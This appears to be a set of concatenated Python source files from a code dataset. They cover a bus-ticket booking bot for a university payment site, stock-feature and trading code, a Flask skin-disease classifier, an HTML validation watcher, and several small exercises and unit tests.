state.environment.coredata.get_builtin_option('localedir'),\n pkg_arg, lang_arg]\n iscript = build.InstallScript(installcmd)\n\n return [pottarget, gmotarget, iscript, updatepotarget]\n\ndef initialize():\n return I18nModule()\n","sub_path":"mesonbuild/modules/i18n.py","file_name":"i18n.py","file_ext":"py","file_size_in_byte":2814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"614410186","text":"from sa.common import get_ms_ticker_names, find_small_cap_tickers\nfrom sa.tools.features import Features\nfrom sa.tools.returncalc import ReturnCalculator\nfrom sa.logger import LOGGER\n\nimport os\nimport numpy as np\n\nfrom sklearn.preprocessing import Imputer\n\nclass FeatureHelper():\n def __init__(self, session):\n self.dir_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'cache')\n self.file_path = os.path.join(self.dir_path, 'features.npz')\n self.sess = session\n self.ff = Features()\n\n def fetch_feature_data(self):\n if not os.path.isfile(self.file_path):\n self.generate_and_save_feature_data()\n\n npz = np.load(self.file_path)\n\n return tuple(npz[a] for a in ('train_data', 'train_targets', 'test_data', 'test_targets'))\n\n def fetch_binary_feature_data(self, p=None):\n train_data, train_targets, test_data, test_targets = self.fetch_feature_data()\n\n median = np.median(train_targets)\n print('meadian is ', median)\n train_targets = np.array([t >= median for t in train_targets])\n test_targets = np.array([t >= median for t in test_targets])\n\n return train_data, train_targets, test_data, test_targets\n\n def fetch_feature_tickers(self):\n npz = np.load(self.file_path)\n\n return npz['train_ticker_names'], npz['test_ticker_names']\n\n def screen_and_save_feature_data(self):\n train_ticker_names, test_ticker_names = self.fetch_feature_tickers()\n train_data, train_targets, test_data, test_targets = self.fetch_feature_data()\n\n tickers = set(find_small_cap_tickers(self.sess)) # finds ticker < 10m value\n train_rm_indexes = []\n for i, (ticker, target) in enumerate(zip(train_ticker_names, train_targets)):\n if target > 10 or ticker in tickers:\n train_rm_indexes.append(i)\n test_rm_indexes = []\n for i, (ticker, target) in enumerate(zip(test_ticker_names, test_targets)):\n if target > 10 or ticker in tickers:\n test_rm_indexes.append(i)\n\n train_ticker_names = np.delete(train_ticker_names, train_rm_indexes, axis=0)\n train_data = np.delete(train_data, train_rm_indexes, axis=0)\n train_targets = np.delete(train_targets, train_rm_indexes, axis=0)\n test_ticker_names = np.delete(test_ticker_names, test_rm_indexes, axis=0)\n test_data = np.delete(test_data, test_rm_indexes, axis=0)\n test_targets = np.delete(test_targets, test_rm_indexes, axis=0)\n\n LOGGER.info(\"Saving file at: {}\".format(self.file_path))\n\n np.savez(self.file_path,\n train_data = train_data, train_targets = train_targets,\n train_ticker_names = train_ticker_names, test_data = test_data,\n test_targets = test_targets, test_ticker_names = test_ticker_names)\n\n def fetch_feature_names(self):\n return self.ff.ms_key_stats_cols\n\n def generate_and_save_feature_data(self, independent=True):\n rc = ReturnCalculator()\n\n ticker_names = sorted(get_ms_ticker_names(self.sess, \"TSX\"))\n num_tickers = len(ticker_names)\n\n train_data, train_targets = [], []\n train_ticker_names = []\n test_data, test_targets = [], []\n test_ticker_names = []\n\n imp = Imputer(missing_values='NaN', strategy='mean', axis=0)\n\n for i, t in enumerate(ticker_names, 1):\n LOGGER.info(\"[{:d}/{:d}] Working on {}...\".format(i, num_tickers, t))\n\n dates = self.ff.ms_key_stats_date(self.sess, t)\n\n if len(dates) < 1:\n continue\n\n date_gap = dates[1] - dates[0] if len(dates) > 2 else timedelta(days=365)\n last_date = dates[-1]\n\n rows = self.ff.ms_key_stats_data(self.sess, t)\n\n if not independent:\n # Window sliding for time series\n empty_row = tuple((None,)) * len(rows[0])\n new_rows = []\n for i in range(len(rows)):\n first_part = rows[i-1] if i > 0 else empty_row\n second_part = rows[i]\n new_rows.append(first_part + second_part)\n rows = new_rows\n\n # Add the start date to the list of dates\n return_dates = [dates[0] - date_gap] + dates\n\n returns = rc.calculate_return_between_dates(t, return_dates)\n for row, date, ret in zip(rows, dates, returns):\n if ret is None: # if return date are out of range\n continue\n\n if date == last_date:\n test_data.append(row)\n test_targets.append(ret)\n test_ticker_names.append(t)\n else:\n train_data.append(row)\n train_targets.append(ret)\n train_ticker_names.append(t)\n\n # Convert the python lists to numpy arrays and fill missing values\n train_data = np.array(train_data, dtype=np.float)\n imp = imp.fit(train_data)\n\n train_ticker_names = np.array(train_ticker_names, dtype=np.str)\n train_data = imp.transform(train_data)\n train_targets = np.array(train_targets, dtype=np.float)\n test_ticker_names = np.array(test_ticker_names, dtype=np.str)\n test_data = imp.transform(np.array(test_data, dtype=np.float))\n test_targets = np.array(test_targets, dtype=np.float)\n\n if not os.path.exists(self.dir_path):\n os.makedirs(self.dir_path)\n\n LOGGER.info(\"Saving file at: {}\".format(self.file_path))\n\n np.savez(self.file_path,\n train_data = train_data, train_targets = train_targets,\n train_ticker_names = train_ticker_names, test_data = test_data,\n test_targets = test_targets, test_ticker_names = test_ticker_names)\n\n\nif __name__ == \"__main__\":\n from sa.database import Session\n\n sess = Session()\n fc = FeatureHelper(sess)\n fc.generate_and_save_feature_data(independent=False)\n fc.screen_and_save_feature_data()\n\n","sub_path":"src/bots/feature_helper.py","file_name":"feature_helper.py","file_ext":"py","file_size_in_byte":6080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"399040587","text":"from commom import cfg as ucasbus_cfg\nfrom crawl2.spider import *\nfrom crawl2.utils import *\nimport os, time, json\nimport numpy as np\nfrom tools import *\nimport threading\nfrom certcode.init import *\n\nname_re = re.compile(\n '
  • 你好,(.*?)
  • ', re.S)\n\nurlcode_re = re.compile('toUtf8(.*?);')\n\ndef keep_alive(eric):\n while True:\n time.sleep(np.random.randint(300, 500))\n if eric.finished:\n return\n ret = eric.check()\n if not ret:\n res, msg, data = auto_recognition_attemps(eric, attemps=5)\n if res == 0 and data[0] == eric.realname:\n pass\n else:\n eric._login = False\n\nclass Eric(object):\n def __init__(self, username):\n self.username = username\n self.page_limit = ucasbus_cfg.page_limit\n self._login = True\n self.cache = Cache(ucasbus_cfg.cache_path)\n self.route_list_cache = Cache(ucasbus_cfg.route_list_path)\n self.user_cache = Cache(\\\n os.path.join(ucasbus_cfg.users_path, username))\n self.spider = Spider(encoding='utf-8')\n self.load()\n self.finished = False\n self.keep_alive = threading.Thread(target=keep_alive, args=(self, ))\n # self.keep_alive.start()\n\n def finish(self):\n self.save()\n self.finished = True\n # self.keep_alive.join()\n\n def check(self):\n response = self.spider.get('http://payment.ucas.ac.cn/NetWorkUI/showPublic')\n if response:\n return self.realname in response.text\n return False\n\n def load(self):\n self.page = self.user_cache.load('page')\n if not isinstance(self.page, list):\n self.page = []\n self.lock = self.user_cache.load('lock')\n if self.lock == None or not isinstance(self.lock, bool):\n self.lock = False\n self.realname = self.user_cache.load('realname')\n if not self.realname:\n self.realname = 'Unknown'\n \n def query_remain(self, data):\n url = 'http://payment.ucas.ac.cn/NetWorkUI/queryRemainingSeats'\n response = self.spider.post(url, data)\n try:\n return '剩余 %s' % response.json()['returndata']['freeseat']\n except:\n return ''\n\n\n def save(self):\n self.user_cache.save(self.page, 'page')\n self.user_cache.save(self.lock, 'lock')\n self.user_cache.save(self.realname, 'realname')\n\n def del_page(self, page):\n if page >= 0 and page < len(self.page):\n self.page[page]['active'] = False\n return self.touch_page()\n\n def new_page(self):\n n = len(self.page)\n for i in range(n):\n if not self.page[i]['active']:\n self.page[i] = {'status': 1, 'active': True}\n return i\n if n >= self.page_limit:\n return -1\n self.page.append({'status': 1, 'active': True})\n return n\n\n def touch_page(self, page=-1):\n if page >= 0 and page < len(self.page) and \\\n self.page[page]['active']:\n return page\n for i in range(len(self.page)):\n if self.page[i]['active']:\n return i\n return self.new_page()\n\n def get_certcode(self, prefix=False):# {{{\n url = 'http://payment.ucas.ac.cn/NetWorkUI/authImage'\n name = hash_func('{}{}'.format(self.username, time.time()))+'.jpg'\n certcode_path = os.path.join(ucasbus_cfg.static_folder, name)\n response = self.spider.get(url)\n if not response:\n return ''\n with open(certcode_path, 'wb') as f:\n f.write(response.content)\n return certcode_path if prefix else name\n # }}}\n def login(self, certcode):# {{{\n msg = []\n url = 'http://payment.ucas.ac.cn/NetWorkUI/fontuserLogin'\n data = self.user_cache.load('login')\n data['checkCode'] = certcode\n response = self.spider.post(url, data=data)\n\n if not response:\n msg += ['[ERR] 登录失败,服务器未响应。']\n return 1, msg, None\n\n name = name_re.findall(response.text)\n if len(name) == 0:\n msg += ['[ERR] 登录失败,信息错误。']\n return 9, msg, None\n else:\n name = name[0]\n msg += ['[SUC] %s 成功登录!' % name]\n return 0, msg, [name]\n # }}}\n def get_route(self, date, cache):# {{{\n url = 'http://payment.ucas.ac.cn/NetWorkUI/queryBusByDate'\n route_list = self.route_list_cache.load(date)\n msg = []\n if not route_list or not cache:\n data = {\n 'bookingdate': date,\n 'factorycode': 'R001',\n }\n response = self.spider.post(url, data=data)\n if not response:\n msg += ['[ERR] 获取路线失败,服务器未响应。']\n return 1, msg, None\n try:\n data = response.json()\n except:\n msg += ['[ERR] 获取路线失败,返回结果无法 json 化。']\n return 3, msg, None\n try: \n route_list = data['routelist']\n except:\n msg += ['[ERR] 获取路线失败,未找到 routelist 。']\n msg += ['[ERR] json = {}'.format(data)]\n return 4, msg, None\n\n self.route_list_cache.save(route_list, date)\n return 0, msg, [route_list]\n # }}}\n def calc_time(self, *, \\\n delta=ucasbus_cfg.delta, timezone=8, debug=None):# {{{\n cur = time.time()\n if debug:\n return debug + cur\n t = 18 * 3600 + delta - (cur + timezone * 3600) % 86400\n if t < 0:\n t += 86400\n return int(t + cur)\n # }}}\n def check_realname(self, step, response):# {{{\n msg = []\n data = name_re.findall(response.text)\n if len(data) == 1 and data[0] == self.realname:\n return 0, msg\n else:\n names = json.dumps(data)\n msg += ['[ERR] #{}: \\'{}\\' 用户不匹配 {}'.format(step, names, self.realname)]\n return step * 10 + 2, msg\n # }}}\n def send_order(self, route, date):# {{{\n msg = []\n data = {\n 'routecode': route, # You need change\n 'payAmt': '6.00',\n 'bookingdate': date, # You need change\n 'payProjectId': '4', \n 'tel': self.user_cache.load('tel'),\n 'factorycode': 'R001',\n }\n url = 'http://payment.ucas.ac.cn/NetWorkUI/reservedBusCreateOrder'\n response = self.spider.post(url, data)\n\n if not response:\n msg += ['[ERR] #1: 服务器未响应。']\n return 11, msg, None\n try:\n information = response.json()\n except:\n msg += ['[ERR] #1: 返回结果无法 json 化。']\n return 13, msg, None\n\n try:\n ret = information['returncode']\n orderno = information['payOrderTrade']['orderno']\n msg += ['[SUC] #1: 获取订单号[{}], 订单信息:{}, {}, {}'.format(orderno, data['bookingdate'][0], data['routecode'][0], data['tel'])]\n return 0, msg, [orderno]\n except:\n msg += ['[ERR] #1: 未找到 returncode 或 payOrderTrade->orderno 字段!']\n msg += ['[ERR] #1: json={}'.format(information)]\n return 14, msg, None\n\n msg += ['[ERR] step #1: json={}'.format(information)]\n return 19, msg, None\n # }}}\n def send_orderno(self, orderno):# {{{\n msg = []\n data = {\n 'orderno': orderno,\n 'orderamt': '6.00',\n 'payType': '03',\n 'mess': '',\n 'start_limittxtime': '',\n 'end_limittxtime': '',\n }\n url = 'http://payment.ucas.ac.cn/NetWorkUI/onlinePay'\n response = self.spider.post(url, data=data)\n\n if not response:\n msg += ['[ERR] #2: 服务器未响应。']\n return 21, msg, None\n \n ret, log = self.check_realname(2, response)\n msg += log\n if ret != 0:\n return ret, msg, None\n # msg += ['[SUC] #2: 成功发送订单: {}!'.format(orderno)]\n return 0, msg, None\n # }}}\n def request_wechat_urlcode(self, orderno):# {{{\n msg = []\n url = 'http://payment.ucas.ac.cn/NetWorkUI/weixinPayAction?orderno=%s'%orderno\n response = self.spider.get(url)\n\n if not response:\n msg += ['[ERR] #3: 服务器未响应!']\n return 31, msg, None\n\n ret, log = self.check_realname(3, response)\n msg += log\n if ret != 0:\n return ret, msg, None\n\n try:\n urlcode = urlcode_re.findall(response.text)[0][2:-2]\n except:\n msg += ['[ERR] #3: urlcode 字段缺失!']\n return 35, msg, None\n msg += ['[SUC] #3: 成功获从订单[{}]中获取urlcode[{}]!'.format(orderno, urlcode)]\n return 0, msg, [urlcode]\n # }}}\n def get_ucas_qrcode(self, urlcode):# {{{\n msg = []\n data = {\n 'msgCode': 'SUCCESS',\n 'weixinMessage': '??',\n 'urlCode': urlcode,\n 'key': 'TkVUV09SS1BBWWtleQ==',\n }\n url = 'http://payment.ucas.ac.cn/NetWorkUI/weiXinQRCode?'\n for key, value in data.items():\n url = url + key + '=' + value + '&'\n response = self.spider.get(url)\n\n if not response:\n msg += ['[ERR] #4: 服务器未响应!']\n return 41, msg, None\n\n ret, log = self.check_realname(4, response)\n msg += log\n if ret != 0:\n return ret, msg, None\n\n text = response.text.replace('src=\"/NetWork', 'src=\"http://payment.ucas.ac.cn/NetWork')\n msg += ['[SUC] 成功生成二维码,根据urlcode[{}]!'.format(urlcode)]\n return 0, msg, [text]\n # }}}\n def buy(self, route, date):# {{{\n msg = ['[LOG] 开始购票。']\n '''\n send order\n '''\n ret, log, data = self.send_order(route, date)\n msg += log\n if ret != 0:\n return ret, msg, None\n orderno = data[0]\n\n\n ret, log, data = self.send_orderno(orderno)\n msg += log\n if ret != 0:\n return ret, msg, None\n\n \n ret, log, data = self.request_wechat_urlcode(orderno)\n msg += log\n if ret != 0:\n return ret, msg, None\n urlcode = data[0]\n\n ret, log, data = self.get_ucas_qrcode(urlcode)\n msg += log\n if ret != 0:\n return ret, msg, None\n html = data[0]\n\n return 0, msg, [urlcode]\n # }}}\n","sub_path":"eric.py","file_name":"eric.py","file_ext":"py","file_size_in_byte":10775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"219192539","text":"import time\nimport sys\ninput = sys.stdin.readline\n\nn, k = list(map(int, input().split()))\ndiv = 1000000007\n\ndef is_over(num):\n if(num >= div):\n return True\n return False\n\ndef get_div(num):\n return num % div\n\ndef get_process(num1, num2):\n if(is_over(num1)):\n num1 = get_div(num1)\n return num1 * num2\n\ndef get_result():\n up = n\n bottom = k\n for i in range(1, k):\n up = get_process(up, up-i)\n bottom = get_process(bottom, bottom-i)\n\n result = up//bottom\n if(is_over(result)):\n return get_div(result)\n\n return get_div(result)\n\ns = time.time()\nprint(get_result())\nprint(time.time() - s)","sub_path":"by date/2021.03.15/11401.py","file_name":"11401.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"289632259","text":"import os\nimport subprocess\nimport shlex\nimport sys\nimport time\nimport logging\nfrom watchdog.observers import Observer\nfrom watchdog.events import PatternMatchingEventHandler\nimport shutil\n\nDEVELOPMENT_DIR = \"/Users/Jamie/Google Drive/CS4/WebTech/development/html/\"\nPRODUCTION_DIR = \"/Users/Jamie/Google Drive/CS4/WebTech/\"\n\ndef errorBeep():\n # terminal alert\n print('\\a')\n # audible alert\n duration = 0.2 # second\n freq = 440 # Hz\n os.system('play --no-show-progress --null --channels 1 synth %s sine %f' % (duration, freq))\n\ndef successBeep():\n # terminal alert\n print('\\a')\n # audible alert\n duration = 0.05 # second\n freq0 = 600 # Hz\n freq1 = 650 # Hz\n os.system('play --no-show-progress --null --channels 1 synth %s sine %f' % (duration, freq0))\n os.system('play --no-show-progress --null --channels 1 synth %s sine %f' % (duration, freq1))\n\n\nclass vnuValidation(PatternMatchingEventHandler):\n\n def extractTargetPath(self, event):\n if event.event_type == 'moved':\n return event.dest_path\n else:\n return event.src_path\n\n def runValidation(self, event):\n target_file = os.path.split(self.extractTargetPath(event)) [1]\n\n\n # new stuff\n target_file_path = self.extractTargetPath(event)\n splits = target_file_path.split('/')\n mirror_file_path = '/'.join(splits[8:])\n # new stuff\n\n\n # run validation\n target_path = \"/Users/Jamie/Google\\ Drive/CS4/WebTech/development/html/\" + mirror_file_path\n arg_str = \"java -jar /Users/Jamie/Google\\ Drive/CS4/WebTech/validation/dist/vnu.jar \" + target_path\n args = shlex.split(arg_str)\n p_vnu = subprocess.run(args, stderr=subprocess.PIPE)\n console_output = p_vnu.stderr.decode('utf-8')\n\n if len(console_output) == 0:\n # HTML passed - copy to public dir\n source_path = DEVELOPMENT_DIR + mirror_file_path\n destination_path = PRODUCTION_DIR +mirror_file_path\n shutil.copyfile(source_path, destination_path)\n print(\"Pass: %s\" %(target_file), '\\n')\n successBeep()\n else:\n # HTML failed\n errorBeep()\n print(\"Error in: %s\" %(target_file),'\\n')\n print(console_output)\n\n\n def on_created(self, event):\n self.runValidation(event)\n\n\n def on_modified(self, event):\n self.runValidation(event)\n\n def on_moved(self, event):\n self.runValidation(event)\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.INFO,\n format='%(asctime)s - %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S')\n path = sys.argv[1] if len(sys.argv) > 1 else DEVELOPMENT_DIR\n\n event_handler = vnuValidation(patterns=[\"*.html\"], ignore_patterns=[], ignore_directories=False)\n\n observer = Observer()\n observer.schedule(event_handler, path, recursive=True)\n observer.start()\n try:\n while True:\n time.sleep(1)\n except KeyboardInterrupt:\n observer.stop()\n observer.join()\n","sub_path":"vnu_automater.py","file_name":"vnu_automater.py","file_ext":"py","file_size_in_byte":3087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"495503408","text":"from flask import Flask, render_template, request\r\nimport os\r\nfrom PIL import Image\r\n\r\nfrom tensorflow.keras.models import load_model\r\nfrom tensorflow.keras.preprocessing import image\r\nimport numpy as np\r\nimport tensorflow as tf\r\n\r\napp = Flask(__name__)\r\nimage_folder = os.path.join('static', 'images')\r\napp.config[\"UPLOAD_FOLDER\"] = image_folder\r\n\r\ndic = {0: 'acne-and-rosacea', 1: 'atopic-dermatitis', 2: 'eczema', 3: 'herpes-zoster', 4: 'lichen-planus', 5: 'nail-fungus', 6: 'other',7: 'psoriasis',8: 'tinea',9: 'urticaria'}\r\ndic1 = {0: 'static/data/0Mụn trứng cá/dinh nghia.PNG', 1: 'static/data/1Viêm da cơ địa/dinhnghia.PNG',\r\n 2: 'static/data/2Chàm/dinhnghia.PNG', 3: 'static/data/3Zona/dinhnghia.PNG',\r\n 4: 'static/data/4Lichen phẳng/dinhnghia.PNG', 5:'static/data/5Nấm móng/dinhnghia.PNG',\r\n 6: 'static/data/6Bệnh khác/dinhnghia.PNG', 7: 'static/data/7Vảy nến/dinhnghia.PNG',\r\n 8: 'static/data/8Nấm da đầu/dinhnghia.PNG', 9: 'static/data/9Mề đay/dinhnghia.PNG' }\r\n\r\ndic2 = {0: 'static/data/0Mụn trứng cá/tuvan.PNG', 1: 'static/data/1Viêm da cơ địa/tuvan.PNG',\r\n 2: 'static/data/2Chàm/tuvan.PNG', 3: 'static/data/3Zona/tuvan.PNG',\r\n 4: 'static/data/4Lichen phẳng/tuvan.PNG', 5:'static/data/5Nấm móng/tuvan.PNG',\r\n 6: 'static/data/6Bệnh khác/tuvan.PNG', 7: 'static/data/7Vảy nến/tuvan.PNG',\r\n 8: 'static/data/8Nấm da đầu/tuvan.PNG', 9: 'static/data/9Mề đay/tuvan.PNG' }\r\n\r\nmodel = load_model('resnet50.h5')\r\nmodel.make_predict_function()\r\n\r\n@app.route('/', methods=['GET'])\r\ndef home():\r\n return render_template('AIMed1.html')\r\n\r\n@app.route('/', methods=['POST'])\r\ndef predict():\r\n # predicting images\r\n imagefile = request.files['imagefile']\r\n image_path = 'static/images/' + imagefile.filename\r\n imagefile.save(image_path)\r\n\r\n img = image.load_img(image_path, target_size=(224, 224))\r\n x = image.img_to_array(img)/255.0\r\n x = np.expand_dims(x, axis=0)\r\n\r\n classes = model.predict(x)\r\n result = np.argmax((classes[0]))\r\n pic = os.path.join(app.config['UPLOAD_FOLDER'], imagefile.filename)\r\n print(classes[0])\r\n print(tf.nn.sigmoid(classes[0]))\r\n print(result)\r\n print(dic[result])\r\n\r\n contents = Image.open('{}'.format(dic2[result]))\r\n\r\n return render_template('AIMed1.html', user_image=pic,\r\n prediction_text='{}'.format(dic[result]),\r\n definition_image='{}'.format(dic1[result]),\r\n advice_image='{}'.format(dic2[result]))\r\n\r\nif __name__ == '__main__':\r\n app.run()\r\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"212134976","text":"# -*- coding: utf-8 -*-\n\"\"\"Stochastic Gradient Descent\"\"\"\n\nimport numpy as np\nimport os\nimport sys\n\ncwd = os.getcwd()\nsys.path.append(cwd)\n\nfrom costs import *\n\n\ndef compute_stoch_gradient_mse(y, tx, w):\n \"\"\"Compute a stochastic gradient from just few examples n and their corresponding y_n labels.\"\"\"\n n, d = tx.shape\n\n e = y - tx.dot(w)\n\n return -tx.T.dot(e) / n\n\n\ndef batch_iter(y, tx, batch_size, num_batches=1, shuffle=True):\n \"\"\"\n Generate a minibatch iterator for a dataset.\n Takes as input two iterables (here the output desired values 'y' and the input data 'tx')\n Outputs an iterator which gives mini-batches of `batch_size` matching elements from `y` and `tx`.\n Data can be randomly shuffled to avoid ordering in the original data messing with the randomness of the minibatches.\n Example of use :\n for minibatch_y, minibatch_tx in batch_iter(y, tx, 32):\n \n \"\"\"\n data_size = len(y)\n\n if shuffle:\n shuffle_indices = np.random.permutation(np.arange(data_size))\n shuffled_y = y[shuffle_indices]\n shuffled_tx = tx[shuffle_indices]\n else:\n shuffled_y = y\n shuffled_tx = tx\n for batch_num in range(num_batches):\n start_index = batch_num * batch_size\n end_index = min((batch_num + 1) * batch_size, data_size)\n if start_index != end_index:\n yield shuffled_y[start_index:end_index], shuffled_tx[start_index:end_index]\n\n\ndef stochastic_gradient_descent_mse(y, tx, initial_w, batch_size, max_iters, gamma):\n \"\"\"Stochastic gradient descent algorithm.\"\"\"\n n,d = tx.shape\n\n ws = [initial_w]\n initial_loss = compute_loss_mse(y, tx, initial_w)\n losses = [initial_loss]\n\n w = initial_w\n n_iter = 0\n\n for batch_y, batch_tx in batch_iter(y, tx, batch_size, max_iters):\n # Compute gradient for current batch\n gradient = compute_stoch_gradient_mse(batch_y, batch_tx, w)\n\n # Update model parameters\n w = w - gamma * gradient\n\n # Compute new loss\n loss = compute_loss_mse(y, tx, initial_w)\n\n # Store w and loss\n ws.append(w)\n losses.append(loss)\n\n print(\"Stochastic GD({bi}/{ti}): loss={l}, w0={w0}, w1={w1}\".format(\n bi=n_iter, ti=max_iters - 1, l=loss, w0=w[0], w1=w[1]))\n\n n_iter += 1\n\n return losses, ws","sub_path":"labs/ex02/template/stochastic_gradient_descent.py","file_name":"stochastic_gradient_descent.py","file_ext":"py","file_size_in_byte":2347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"81725380","text":"import wikipedia\nimport re\nimport os\nimport csv\n\nclass Wikipedia:\n\tdef __init__(self):\n\t\tpass\n\n\tdef search(self, query):\n\t\t''' Wikipedia search function '''\n\t\t# try catch faulty queries, or queries resulting in disambiguation errors. \n\t\tprint('Wikipedia search in progress ...')\n\t\ttry: \n\t\t\tobj = wikipedia.page(wikipedia.search(query)[0])\n\t\t\ttext = obj.content\n\t\t\ttext = text.split('. ')\n\t\t\ttext = [[' '.join(re.sub(\"(@[A-Za-z0-9]+)|([^0-9A-Za-z \\t])|(\\w+:\\/\\/\\S+)\", \" \", sentence).split())] for sentence in text]\n\t\t\treturn text\n\t\texcept:\n\t\t\tprint('query error - try a more specific query')\n\t\t\tprint('possible that a wikipedia page pertaining to this query does not exist.')\n\t\tprint('Wikipedia search completed \\n')\n\t\treturn text\n\n\tdef buildCsv(self, wikiText, filename):\n\t\tprint('Writing %s ...' % (filename + '_cleaned' + '.csv'))\n\t\tif not os.path.exists('../data/'):\n\t\t\tos.makedirs('../data/')\n\n\t\tif not os.path.exists('../data/' + filename + '_cleaned' + '.csv'):\n\t\t\tf = open('../data/' + filename + '_cleaned' + '.csv', 'w')\n\t\t\tf.close()\n\n\t\twith open('../data/' + filename + '_cleaned' + '.csv', 'w', newline='') as f:\n\t\t\twriter = csv.writer(f)\n\t\t\twriter.writerows(wikiText)\n\t\tprint('%s written to /data \\n' % (filename + '_cleaned' + '.csv'))","sub_path":"src/wiki.py","file_name":"wiki.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"477005048","text":"import sys\nclass Solution(object):\n def maxProfit(self, k, prices):\n \"\"\"\n :type k: int\n :type prices: List[int]\n :rtype: int\n \"\"\"\n n = len(prices)\n if k == 0 or n == 0: return 0\n if k < n / 2:\n sells = [0] * k\n holds = [-sys.maxint] * k\n # print n, k\n for p in prices:\n for j in range(k-1,0,-1):\n sells[j] = max(sells[j], holds[j] + p)\n holds[j] = max(holds[j], sells[j-1] - p)\n sells[0] = max(sells[0], holds[0] + p)\n holds[0] = max(holds[0], -p)\n return sells[-1]\n else:\n profit = 0\n for i in range(1, n):\n if prices[i] > prices[i-1]:\n profit += prices[i] - prices[i-1]\n return profit\n \n \n ","sub_path":"python/leetcode/state_machine/188_Best_Time_to_Buy_and_Sell_Stock_IV.py","file_name":"188_Best_Time_to_Buy_and_Sell_Stock_IV.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"426133752","text":"from app import createapp\nimport unittest\nimport json\n\nfrom app.api.v1.models.officemodels import OFFICES\n\n\nclass RoutesBaseTest(unittest.TestCase):\n def setUp(self):\n self.app = createapp()\n self.client = self.app.test_client()\n self.office1 = {\n \"type\": \"Member of Paliament\",\n \"name\": \"MP Nairobi\"\n }\n self.erroroffice = {\n }\n # tear down test\n\n def tearDown(self):\n \"\"\"Final cleanup after tests run\"\"\"\n self.app.testing = False\n\n\nclass TestOfficesEndPoints(RoutesBaseTest):\n\n def test_view_all_offices(self):\n response = self.client.get(\"api/v1/offices\")\n self.assertEqual(response.status_code, 200)\n result = json.loads(response.data.decode('utf-8'))\n self.assertEqual(result[\"data\"], [{\n \"name\": \"dsd\",\n \"type\": \"trtr\",\n \"id\": 23\n }])\n self.assertEqual(result[\"status\"], 200)\n\n def test_view_specific_undefined_office(self):\n response = self.client.get(\"api/v1/offices/12\")\n result = json.loads(response.data.decode(\"utf-8\"))\n self.assertEqual(result[\"status\"], 404)\n\n def test_create_office(self):\n res = self.client.post(\"api/v1/offices\", data=json.dumps({\n \"name\": \"dsd\",\n \"type\": \"trtr\",\n \"id\": 23\n }), content_type=\"application/json\")\n result = json.loads(res.data.decode(\"utf-8\"))\n self.assertEqual(result[\"status\"], 201)\n self.assertEqual(result[\"data\"], [{'id': 23, 'name':\n 'dsd', 'type': 'trtr'}])\n\n def test_create_office_with_bad_request(self):\n res = self.client.post(\"api/v1/offices\", data=json.dumps({\n \"name\": \"dsd\",\n \"type\": \"trtr\"\n }), content_type=\"application/json\")\n result = json.loads(res.data.decode(\"utf-8\"))\n self.assertEqual(result[\"status\"], 400)\n self.assertEqual(result['error'], 'Must provide id, name and type')\n\n def test_edit_office_not_found(self):\n response = self.client.get(\"api/v1/offices\")\n self.assertEqual(response.status_code, 200)\n result = json.loads(response.data.decode('utf-8'))\n self.assertEqual(result[\"status\"], 200)\n self.assertEqual(result[\"data\"], [{'id': 23, 'name':\n 'dsd', 'type': 'trtr'}])\n","sub_path":"tests/test_office_routes.py","file_name":"test_office_routes.py","file_ext":"py","file_size_in_byte":2457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"605214437","text":"r\"\"\"Test `lmp.util._dataset._preprocess_wiki_tokens`.\n\nUsage:\n python -m unittest test.lmp.util._dataset.test_preprocess_wiki_tokens\n\"\"\"\n\n# built-in modules\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport inspect\nimport math\nimport os\nimport unittest\n\n# self-made modules\n\nimport lmp.path\nimport lmp.util\n\n\n# pylint: disable=W0212\nclass TestPreprocessWikiTokens(unittest.TestCase):\n r\"\"\"Test case of `lmp.util._dataset._preprocess_news_collection`\"\"\"\n\n def test_signature(self):\n r\"\"\"Ensure signature consistency.\"\"\"\n msg = 'Inconsistent method signature.'\n self.assertEqual(\n inspect.signature(lmp.util._dataset._preprocess_wiki_tokens),\n inspect.Signature(\n parameters=[\n inspect.Parameter(\n name='split',\n kind=inspect.Parameter.POSITIONAL_OR_KEYWORD,\n annotation=str,\n default=inspect.Parameter.empty\n )\n ],\n return_annotation=lmp.dataset.LanguageModelDataset\n ),\n msg=msg\n )\n\n def test_invaild_input_split(self):\n r\"\"\"Raise exception when input `split` is invalid.\"\"\"\n msg1 = (\n 'Must raise `TypeError` or `FileNotFoundError` when input `split` '\n 'is invaild.'\n )\n msg2 = 'Inconsistent error message.'\n examples = (\n False, True, 0, 1, -1, 0.0, 1.0, math.nan, -math.nan, math.inf,\n -math.inf, 0j, 1j, b'', (), [], {}, set(), object(), lambda x: x,\n type, None, NotImplemented, ..., 'NotExistFile'\n )\n\n for invaild_input in examples:\n with self.assertRaises(\n (FileNotFoundError, TypeError),\n msg=msg1\n ) as ctx_man:\n lmp.util._dataset._preprocess_wiki_tokens(invaild_input)\n\n if isinstance(ctx_man.exception, TypeError):\n self.assertEqual(\n ctx_man.exception.args[0],\n '`split` must be an instance of `str`.',\n msg=msg2\n )\n else:\n file_path = os.path.join(\n f'{lmp.path.DATA_PATH}',\n f'wiki.{invaild_input}.tokens'\n )\n self.assertEqual(\n ctx_man.exception.args[0],\n f'file {file_path} does not 